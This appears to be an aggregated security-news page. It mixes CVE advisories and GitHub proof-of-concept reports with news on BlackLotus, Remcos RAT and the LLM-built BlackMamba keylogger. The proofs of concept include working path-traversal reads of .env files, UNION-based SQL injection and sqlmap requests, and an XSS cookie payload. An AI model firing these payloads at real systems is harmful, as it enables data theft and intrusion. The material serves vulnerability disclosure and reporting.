emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2023-27986: security - Shell command and Emacs Lisp code injection in emacsclient-mail.desktop

onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/file/download.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:file reading
4.  Vulnerability Details：  
    Vulnerability location  
    Vulnerability occurs in  
    The app\\admin\\controller\\File#download method directly does not filter the incoming url, causing arbitrary file reading

Vulnerability reproduction Read the database configuration file.env  
GET /admin1/file/download?url=../.env&title=英文.png HTTP/1.1 Host: 192.168.3.129:8091 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.3.129:8091/admin1/file/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

CVE-2023-26948: Background arbitrary file reading vulnerability 2 · Issue #5 · keheying/onekeyadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#list method  
  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
\`POST /databases/table/list?id='+UNION+ALL+SELECT+NULL,CONCAT(0x7162626b71,user(),0x71766a6b71),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`

CVE-2023-24777: Database management plug-in table.php list-sql injection vulnerability · Issue #5 · funadmin/funadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#edit method  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
Conditions: background administrator rights  
sqlmap poc save as txt

\`POST /databases/database/edit?id=fun\_addon\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420;  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24782: Database management plug-in database.php edit-sql registration vulnerability · Issue #3 · funadmin/funadmin

By Deeba Ahmed
Security firm ESET’s cybersecurity researchers have shared their analysis of the world’s first UEFI bootkit being used in…
This is a post from HackRead.com Read the original post: BlackLotus UEFI bootkit Can Bypass Secure Boot on Windows

Security firm ESET’s cybersecurity researchers have shared their analysis of the world’s first UEFI bootkit being used in the wild, which can bypass Secure Boot on fully-updated UEFI systems. It can even bypass it on fully-updated Windows 10 and 11 versions.

**ESET’s Deep-Dive Analysis of UEFI Bootkit**

According to researchers, there is no indication of who created this bootkit or its name, so they concluded that it corresponds to the BlackLotus bootkit. This bootkit has been promoted in underground cybercrime forums since 2022 for $5,000, with an additional $200 for updates.

**Understanding BlackLotus Capabilities**

BlackLotus is written in assembly and C programming languages, so developers can insert a suite of powerful features into an 80kb file. It not only disables Secure Boot but many other OS security mechanisms, including Hypervisor-protected Code Integrity (HVCI), BitLocker, and Windows Defender.

This bootkit can run on fully-updated systems running Windows 11 with UEFI Secure Boot enabled. It targets the firmware’s low-level chain called the Unified Extensible Firmware Interface (UEFI). This complex chain is responsible for booting modern computers. The UEFI bridges the computer’s firmware with the OS while serving as an OS itself.

Since the UEFI is located in the SPI-connected flash storage chip present on the computer’s motherboard, it is extremely hard to inspect or patch it. The difference between the way BlackLotus targets UEFI and other bootkits like MoonBounce, CosmicStrand, and MosaicRegressor is that these target the UEFI firmware stored in the flash storage chip whereas BlackLotus targets the software in the EFI system partition.

**How Does BlackLotus Defeats Secure Boot?**

It is achieved by exploiting a vulnerability found in all supported versions of Microsoft Windows and patched in January 2022. It is tracked as **CVE-2022-21894**. This is a logic flaw, dubbed “Baton Drop” by the researcher who discovered it, which can be exploited for removing Secure Boot functions entirely from the boot sequence when the PC starts.

Threat actors can easily exploit this flaw to obtain keys for BitLocker, which encrypts hard drives. For BlackLotus creators, this flaw has proven immensely useful because, despite being patched, the vulnerable signed binaries haven’t yet been added to the UEFI revocation list, which alerts about untrusted boot files.

**According to researchers**, hundreds of vulnerable bootloaders are currently in use, and if these signed binaries are revoked, it would render millions of devices useless. That’s why fully updated devices are still vulnerable because threat actors can replace patched software with vulnerable, old software.

**Why UEFI Bootkits are a Threat?**

UEFI bootkits are powerful threats because the UEFI has complete control over the operating system’s boot process. That is how it can disable various OS security mechanisms and deploy its own kernel-mode and user-mode payloads in early OS startup stages. This lets the attackers stealthily operate and gain high privileges.

**How the Bootkit is Deployed?**

The way this bootkit is deployed is unclear, but the attack chain involves an installer component that writes files to the EFI system partition and disables HVCI and BitLocker, after which it reboots the host.

BlackLotus disables protection solutions to deploy a kernel driver, which protects against the bootkit file deletion, and an HTTP loader. Conversely, the bootloader establishes communication with the control server and executes the payload.

1.  **New Python Malware Hits Windows Devices**
2.  **ElectroRat hits MacOS, Windows, Linux devices**
3.  **96% of New Malware in 2022 Targeted Windows**
4.  **Chinese Hackers Hide Malware in Windows Logo**
5.  **LodaRAT Windows malware hits Android Phones**
6.  **OpenAI’s ChatGPT Creates Polymorphic Malware**

BlackLotus UEFI bootkit Can Bypass Secure Boot on Windows

onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:file reading  
Vulnerability Details：  
Vulnerability location  
app\\admin\\controller\\Curd#code Here the file\_get\_contents function is called without any filtering  

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence  
Here we read the database configuration file .env in the root directory

poc  
\`POST /admin1/curd/code HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 59  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/curd/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"name":"test","title":"test","cover":"../.env","table":\[\]}\`  

You can see that the file was successfully written to our menu.png, causing any file to be read  
http://192.168.3.129:8091/plugins/test/menu.png

CVE-2023-26956: Background development assistant arbitrary file reading vulnerability · Issue #4 · keheying/onekeyadmin

By Deeba Ahmed
Currently, scammers are using DBatLoader malware loader to distribute Remcos RAT to businesses and institutions across Eastern Europe. 
This is a post from HackRead.com Read the original post: Phishing Attack Uses UAC Bypass to Drop Remcos RAT Malware

****The phishing attack commences by sending malicious emails disguised as financial files, such as invoices.****

The cybersecurity researchers at SentinelOne have observed a new phishing campaign in which attackers are abusing the Windows User Account Control (UAC) bypass to distribute the DBatLoader and **Remcos RAT malware**. The primary targets of this campaign are organizations in Eastern Europe.

**New Phishing Campaign Delivering Remcos RAT**

According to SentinelOne, scammers are using DBatLoader malware loader to distribute Remcos RAT to businesses and institutions across **Eastern Europe**. The attackers use emails that seem to have come from authentic sources, such as reputed institutions in their target regions, to lure victims.

When they are successful in luring users into clicking on the malicious link included in the email’s content, the attackers easily leverage the malware loader, bypass Windows UAC, and drop Remcos RAT.

**How Does the Attack Occur?**

The attack commences by sending **phishing emails** disguised as financial files, such as invoices. These emails include a tar.lz archive containing the DBatLoader executable.

The phishing email as seen by SentinelOne

When the victim checks this email, they are lured into opening the DBatLoader’s initial stage payload, which is disguised as a LibreOffice, PDF, or MS Office document. Once this is done, the second-stage payload is retrieved from Google Drive or Microsoft OneDrive, one of which has been active for at least a month.

“When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload data from a public cloud location,” said SentinelOne’s Aleksandar Milenkoski.

According to SentinelOne’s **blog post**, the RAT is loaded only when DBatLoader executes a Windows batch script through a Windows UAC evasion technique involving **DLL hijacking** and mocking trusted directories. Through easinvoker.exe, Windows automatically elevates the process without issuing a UAC prompt when located in a trusted directory—the mock %SystemRoot%System32 directory.

**About Remcos RAT and DBatLoader**

DBatLoader abuses public cloud infrastructure for hosting its malware-loading capabilities. Remcos is a feature-rich RAT, which is frequently used by cybercriminals in espionage campaigns and is typically distributed via phishing emails.

Ukrainian CERT recently reported about **Remcos-based phishing campaigns** targeting state institutions for conducting espionage. In this instance, the attackers used password-protected archives as malicious email attachments.

This malware can collect keystrokes, video, audio, screenshots, and device or system-related information. Moreover, it can also deliver additional malware to the system.

1.  **New Python Malware Hits Windows Devices**
2.  **ElectroRat hits MacOS, Windows, Linux devices**
3.  **96% of New Malware in 2022 Targeted Windows**
4.  **Chinese Hackers Hide Malware in Windows Logo**
5.  **LodaRAT Windows malware hits Android Phones**
6.  **OpenAI’s ChatGPT Creates Polymorphic Malware**

Phishing Attack Uses UAC Bypass to Drop Remcos RAT Malware

A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

**Phone Shop Sales Managements System v1.0 has Cross-site scripting (reflected)**

BUG\_Author: Blair

Source code website address：https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html

Vulnerability File: /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php

Payload1:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(1111)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(1111)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=6fcav63hl60icb4n7tsvv0ns5k
    Connection: close
    

Payload2:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(document.cookie)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close

CVE-2023-1275: bug_report/XSS-1.md at main · blairting/bug_report

Researchers warn that polymorphic malware created with ChatGPT and other LLMs will force a reinvention of security automation.

A proof-of-concept, artificial intelligence (AI)-driven cyberattack that changes its code on the fly can slip past the latest automated security-detection technology, demonstrating the potential for creating undetectable malware.

Researchers from HYAS Labs demonstrated the proof-of-concept attack, which they call BlackMamba, which exploits a large language model (LLM) — the technology on which ChatGPT is based — to synthesize a polymorphic keylogger functionality on the fly. The attack is "truly polymorphic" in that every time BlackMamba executes, it resynthesizes its keylogging capability, the researchers wrote.

The BlackMamba attack, outlined in a blog post, demonstrates how AI can allow the malware to dynamically modify benign code at runtime without any command-and-control (C2) infrastructure, allowing it to slip past current automated security systems that are attuned to look out for this type of behavior to detect attacks.

"Traditional security solutions like endpoint detection and response (EDR) leverage multi-layer, data intelligence systems to combat some of today’s most sophisticated threats, and most automated controls claim to prevent novel or irregular behavior patterns," the HYAS Labs researchers wrote. "But in practice, this is very rarely the case."

They tested the attack against an EDR system that was not identified specifically, but characterized as "industry leading," often resulting in zero alerts or detections.

Using its built-in keylogging ability, BlackMamba can collect sensitive information from a device, including usernames, passwords, and credit card numbers, the researchers said. Once this data is captured, the malware uses a common and trusted collaboration platform — Microsoft Teams — to send the collected data to a malicious Teams channel. From there, attackers can exploit the data in various nefarious ways, selling it on the Dark Web or using it for further attacks, the HYAS Labs researchers said.

"MS Teams is a legitimate communication and collaboration tool that is widely used by organizations, so malware authors can leverage it to bypass traditional security defenses, such as firewalls and intrusion detection systems," they wrote. "Also, since the data is sent over encrypted channels, it can be difficult to detect that the channel is being used for exfiltration."

Moreover, because BlackMamba's delivery system is based on an open source Python package, it allows developers to convert Python scripts into standalone executable files that can be run on various platforms, including Windows, macOS, and Linux, they wrote.

**What This Means for Modern Security**

AI-powered attacks like this will become more common now as threat actors create polymorphic malware that leverages ChatGPT and other sophisticated, data-intelligence systems based on LLM, according to the HYAS Labs researchers. This, in turn, will force automated security technology to evolve as well to manage and combat these threats.

“The threats posed by this new breed of malware are very real," the researchers wrote in the post. "By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today's predictive security solutions."

Typically, organizations that deploy EDR and other automated security controls as part of a modern security stack believe they're doing everything in their power to detect and prevent malicious activity. However, BlackMamba's use of AI now demonstrates that "they are not foolproof," the HYAS Labs researchers noted.

"The BlackMamba proof-of-concept shows that LLMs can be exploited to synthesize polymorphic keylogger functionality on-the-fly, making it difficult for EDR to intervene," they wrote.

The security landscape will have to evolve alongside attackers' use of AI to keep up with the more sophisticated attacks that are on the horizon, according to the researchers. Until then, it's imperative that organizations "remain vigilant, keep their security measures up to date," they advised, "and adapt to new threats that emerge by operationalizing cutting-edge research being conducted in this space."

AI-Powered 'BlackMamba' Keylogging Attack Evades Modern EDR Security

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in database.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#list method  
  
  
Get the id directly and splice it into the sql statement

Vulnerability reproduction:  
Background administrator rights  
sqlmap poc save as txt  
\`POST /databases/database/list?id=\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

Tag

#windows